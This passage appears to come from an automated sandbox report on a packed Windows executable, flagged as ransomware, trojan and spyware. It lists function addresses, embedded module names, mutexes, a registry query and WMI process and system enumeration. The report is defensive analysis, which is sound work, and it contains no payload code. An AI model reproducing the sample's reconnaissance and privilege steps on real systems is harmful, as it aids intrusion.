              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFE0076155A1_2_00007FFE0076155A
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFE00761FDC1_2_00007FFE00761FDC
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFE007621E41_2_00007FFE007621E4
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFE007615461_2_00007FFE00761546
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFE007ADE501_2_00007FFE007ADE50
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFE007860301_2_00007FFE00786030
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFE00761AD71_2_00007FFE00761AD7
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFE013192B01_2_00007FFE013192B0
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFE013222501_2_00007FFE01322250
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFE01384C701_2_00007FFE01384C70
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFE013121E01_2_00007FFE013121E0
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFE013270401_2_00007FFE01327040
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFE013041201_2_00007FFE01304120
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFE0131C3801_2_00007FFE0131C380
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFE013743B01_2_00007FFE013743B0
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFE013673501_2_00007FFE01367350
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFE0131D2B01_2_00007FFE0131D2B0
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFE013C42B01_2_00007FFE013C42B0
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFE013032F51_2_00007FFE013032F5
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFE0138A3001_2_00007FFE0138A300
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFE0132D3101_2_00007FFE0132D310
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFE013073361_2_00007FFE01307336
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFE0134F2D01_2_00007FFE0134F2D0
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFE0132F2F01_2_00007FFE0132F2F0
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFE013045701_2_00007FFE01304570
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFE013315A01_2_00007FFE013315A0
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFE013245A01_2_00007FFE013245A0
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFE0135B5B01_2_00007FFE0135B5B0
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFE0132E5C01_2_00007FFE0132E5C0
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFE013A54A01_2_00007FFE013A54A0
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFE0134A5101_2_00007FFE0134A510
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFE013094D01_2_00007FFE013094D0
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFE013777501_2_00007FFE01377750
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFE013048201_2_00007FFE01304820
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFE013727E61_2_00007FFE013727E6
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFE013136501_2_00007FFE01313650
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFE0135E6701_2_00007FFE0135E670
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFE013606C01_2_00007FFE013606C0
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFE013299A01_2_00007FFE013299A0
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFE013629501_2_00007FFE01362950
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD9A5B30278_2_00007FFD9A5B3027
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FE7AE1083_2_00007FF64FE7AE10
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FE5ABA083_2_00007FF64FE5ABA0
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FE87B2483_2_00007FF64FE87B24
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FE60A2C83_2_00007FF64FE60A2C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FE5188483_2_00007FF64FE51884
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FE5B54083_2_00007FF64FE5B540
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FE654C083_2_00007FF64FE654C0
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FE582F083_2_00007FF64FE582F0
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FE6118083_2_00007FF64FE61180
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FE7010483_2_00007FF64FE70104
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FEB00F083_2_00007FF64FEB00F0
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FE8007483_2_00007FF64FE80074
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FE7C05C83_2_00007FF64FE7C05C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FE8804083_2_00007FF64FE88040
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FE6303083_2_00007FF64FE63030
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FE8C00C83_2_00007FF64FE8C00C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FE94FE883_2_00007FF64FE94FE8
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FEBDFD883_2_00007FF64FEBDFD8
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FEBAF9083_2_00007FF64FEBAF90
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FE85F4C83_2_00007FF64FE85F4C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FE8AF0C83_2_00007FF64FE8AF0C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FE59EFC83_2_00007FF64FE59EFC
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FE9EEA483_2_00007FF64FE9EEA4
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FE5CE8483_2_00007FF64FE5CE84
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FEAFE7483_2_00007FF64FEAFE74
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FE68E6883_2_00007FF64FE68E68
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FE9AE5083_2_00007FF64FE9AE50
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FE5EE0883_2_00007FF64FE5EE08
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FE61E0483_2_00007FF64FE61E04
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FEA1DCC83_2_00007FF64FEA1DCC
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FE99D7483_2_00007FF64FE99D74
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FE80D2083_2_00007FF64FE80D20
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FE79D0C83_2_00007FF64FE79D0C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FEA6D0C83_2_00007FF64FEA6D0C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FE5DD0483_2_00007FF64FE5DD04
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FE95C8C83_2_00007FF64FE95C8C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FE68C3083_2_00007FF64FE68C30
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FEA9B9883_2_00007FF64FEA9B98
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FE94B3883_2_00007FF64FE94B38
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FE5CB1483_2_00007FF64FE5CB14
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FEBAAC083_2_00007FF64FEBAAC0
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FE95A7083_2_00007FF64FE95A70
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FE8FA6C83_2_00007FF64FE8FA6C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FE969FD83_2_00007FF64FE969FD
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FE549B883_2_00007FF64FE549B8
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FE7D97C83_2_00007FF64FE7D97C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FE8D91C83_2_00007FF64FE8D91C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FE9190C83_2_00007FF64FE9190C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FE8090483_2_00007FF64FE80904
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FE838E883_2_00007FF64FE838E8
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FEA18A883_2_00007FF64FEA18A8
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FE6289083_2_00007FF64FE62890
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FE5888483_2_00007FF64FE58884
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FE767E083_2_00007FF64FE767E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FE617C883_2_00007FF64FE617C8
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FE8A71083_2_00007FF64FE8A710
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FE9071083_2_00007FF64FE90710
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FE9270083_2_00007FF64FE92700
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FEB86D483_2_00007FF64FEB86D4
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FE686C483_2_00007FF64FE686C4
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FEA766083_2_00007FF64FEA7660
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FEA260C83_2_00007FF64FEA260C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FE865FC83_2_00007FF64FE865FC
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FE7F5B083_2_00007FF64FE7F5B0
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FE6859883_2_00007FF64FE68598
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FE8F59C83_2_00007FF64FE8F59C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FE5A50483_2_00007FF64FE5A504
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FE9546883_2_00007FF64FE95468
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FE7D45883_2_00007FF64FE7D458
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FE7C3E083_2_00007FF64FE7C3E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FE8037483_2_00007FF64FE80374
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FE6236083_2_00007FF64FE62360
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FEA832C83_2_00007FF64FEA832C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FEA131483_2_00007FF64FEA1314
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FE542E083_2_00007FF64FE542E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FE6D2C083_2_00007FF64FE6D2C0
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FE902A483_2_00007FF64FE902A4
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FEA226883_2_00007FF64FEA2268
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FE5F24C83_2_00007FF64FE5F24C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FE7724483_2_00007FF64FE77244
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FE6E21C83_2_00007FF64FE6E21C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FEB41CC83_2_00007FF64FEB41CC
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FE981CC83_2_00007FF64FE981CC
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FE9216483_2_00007FF64FE92164
              Source: C:\Users\user\Desktop\program.exeCode function: String function: 00007FF6B7502710 appears 104 times
              Source: C:\Users\user\Desktop\program.exeCode function: String function: 00007FFE00761325 appears 518 times
              Source: C:\Users\user\Desktop\program.exeCode function: String function: 00007FFE007DD341 appears 1192 times
              Source: C:\Users\user\Desktop\program.exeCode function: String function: 00007FFE007DD33B appears 39 times
              Source: C:\Users\user\Desktop\program.exeCode function: String function: 00007FF6B7502910 appears 34 times
              Source: C:\Users\user\Desktop\program.exeCode function: String function: 00007FFE007DD32F appears 324 times
              Source: C:\Users\user\Desktop\program.exeCode function: String function: 00007FFE007DDB03 appears 45 times
              Source: C:\Users\user\Desktop\program.exeCode function: String function: 00007FFE01309340 appears 80 times
              Source: C:\Users\user\Desktop\program.exeCode function: String function: 00007FFE0130A500 appears 99 times
              Source: C:\Users\user\Desktop\program.exeCode function: String function: 00007FFE007DD425 appears 48 times
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: String function: 00007FF64FE68444 appears 48 times
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: String function: 00007FF64FE949F4 appears 53 times
              Source: program.exeStatic PE information: invalid certificate
              Source: rar.exe.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
              Source: unicodedata.pyd.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
              Source: program.exeBinary or memory string: OriginalFilename vs program.exe
              Source: program.exe, 00000000.00000003.1705401470.000002641A640000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_sqlite3.pyd. vs program.exe
              Source: program.exe, 00000000.00000003.1704155388.000002641A640000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs program.exe
              Source: program.exe, 00000000.00000003.1704988326.000002641A640000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs program.exe
              Source: program.exe, 00000000.00000003.1705192262.000002641A640000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs program.exe
              Source: program.exe, 00000000.00000003.1705283255.000002641A640000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs program.exe
              Source: program.exe, 00000000.00000003.1704360069.000002641A640000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs program.exe
              Source: program.exe, 00000000.00000003.1708318223.000002641A640000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesqlite3.dll0 vs program.exe
              Source: program.exe, 00000000.00000003.1704487837.000002641A640000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs program.exe
              Source: program.exe, 00000000.00000003.1708160860.000002641A640000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs program.exe
              Source: program.exe, 00000000.00000003.1704607095.000002641A640000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_decimal.pyd. vs program.exe
              Source: program.exe, 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameCMSTP.EXE` vs program.exe
              Source: program.exe, 00000000.00000003.1708610018.000002641A640000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs program.exe
              Source: program.exe, 00000000.00000003.1705081700.000002641A640000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs program.exe
              Source: program.exe, 00000000.00000003.1706789669.000002641A640000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibsslH vs program.exe
              Source: program.exe, 00000000.00000003.1705512770.000002641A640000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs program.exe
              Source: program.exeBinary or memory string: OriginalFilename vs program.exe
              Source: program.exe, 00000001.00000002.2119683016.00007FFDFBAB5000.00000004.00000001.01000000.00000004.sdmpBinary or memory string: OriginalFilenamepython313.dll. vs program.exe
              Source: program.exe, 00000001.00000002.2118578234.00007FFDFB42A000.00000004.00000001.01000000.0000000F.sdmpBinary or memory string: OriginalFilenamelibcryptoH vs program.exe
              Source: program.exe, 00000001.00000002.2120315849.00007FFE0147C000.00000004.00000001.01000000.0000000B.sdmpBinary or memory string: OriginalFilenamesqlite3.dll0 vs program.exe
              Source: program.exe, 00000001.00000002.2122180293.00007FFE130CC000.00000004.00000001.01000000.0000000D.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs program.exe
              Source: program.exe, 00000001.00000002.2121822253.00007FFE11EE6000.00000004.00000001.01000000.00000006.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs program.exe
              Source: program.exe, 00000001.00000002.2119999506.00007FFE00829000.00000004.00000001.01000000.00000010.sdmpBinary or memory string: OriginalFilenamelibsslH vs program.exe
              Source: program.exe, 00000001.00000002.2120776807.00007FFE0EB64000.00000004.00000001.01000000.0000000A.sdmpBinary or memory string: OriginalFilename_sqlite3.pyd. vs program.exe
              Source: program.exe, 00000001.00000002.2122667935.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs program.exe
              Source: program.exe, 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameCMSTP.EXE` vs program.exe
              Source: program.exe, 00000001.00000002.2123115710.00007FFE1A46A000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs program.exe
              Source: program.exe, 00000001.00000002.2117294434.00007FFDFAF12000.00000004.00000001.01000000.00000013.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs program.exe
              Source: program.exe, 00000001.00000002.2120983307.00007FFE1152A000.00000004.00000001.01000000.00000008.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs program.exe
              Source: program.exe, 00000001.00000002.2120574846.00007FFE0E183000.00000004.00000001.01000000.0000000E.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs program.exe
              Source: program.exe, 00000001.00000002.2122455558.00007FFE13218000.00000004.00000001.01000000.0000000C.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs program.exe
              Source: program.exe, 00000001.00000002.2121995089.00007FFE12E1C000.00000004.00000001.01000000.00000012.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs program.exe
              Source: program.exe, 00000001.00000002.2121517959.00007FFE11EB3000.00000004.00000001.01000000.00000011.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs program.exe
              Source: program.exeBinary or memory string: OriginalFilenameCMSTP.EXE` vs program.exe
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
              Source: C:\Users\user\Desktop\program.exeProcess created: Commandline size = 3647
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3615
              Source: C:\Users\user\Desktop\program.exeProcess created: Commandline size = 3647Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3615
              Source: libcrypto-3.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9991990186771459
              Source: libssl-3.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9923211348684211
              Source: python313.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9994153529876473
              Source: sqlite3.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9975483390549273
              Source: unicodedata.pyd.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9926987474437627
              Source: classification engineClassification label: mal100.rans.troj.adwa.spyw.expl.evad.winEXE@164/56@2/2
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FE6CAFC GetLastError,FormatMessageW,83_2_00007FF64FE6CAFC
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FE6EF50 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,83_2_00007FF64FE6EF50
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FE9B57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,83_2_00007FF64FE9B57C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FE73144 GetDiskFreeSpaceExW,83_2_00007FF64FE73144
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9176:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8652:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3524:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8528:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8492:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8152:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8836:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7824:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8876:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7400:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1216:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8632:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2504:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3736:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7972:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7968:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7848:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5780:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1368:120:WilError_03
              Source: C:\Users\user\Desktop\program.exeMutant created: \Sessions\1\BaseNamedObjects\7
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7392:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7448:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5544:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8204:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8816:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8504:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8828:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7856:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8612:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8680:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9040:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8844:120:WilError_03
              Source: C:\Users\user\Desktop\program.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73082Jump to behavior
              Source: program.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
